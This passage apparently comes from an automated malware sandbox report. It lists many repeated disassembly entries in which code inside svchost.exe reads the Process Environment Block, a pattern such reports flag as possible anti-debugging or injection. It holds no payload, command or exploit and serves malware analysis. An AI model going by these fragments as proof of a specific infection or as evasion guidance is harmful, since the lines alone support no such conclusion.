                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]2_2_02FEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]2_2_02FEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]2_2_03004B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]2_2_02F6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]2_2_02F6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]2_2_02F5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]2_2_02FBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]2_2_02F5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02FBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02FDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]2_2_03004A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]2_2_02F2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]2_2_02F28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]2_2_02FDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]2_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]2_2_02FD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]2_2_03004940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
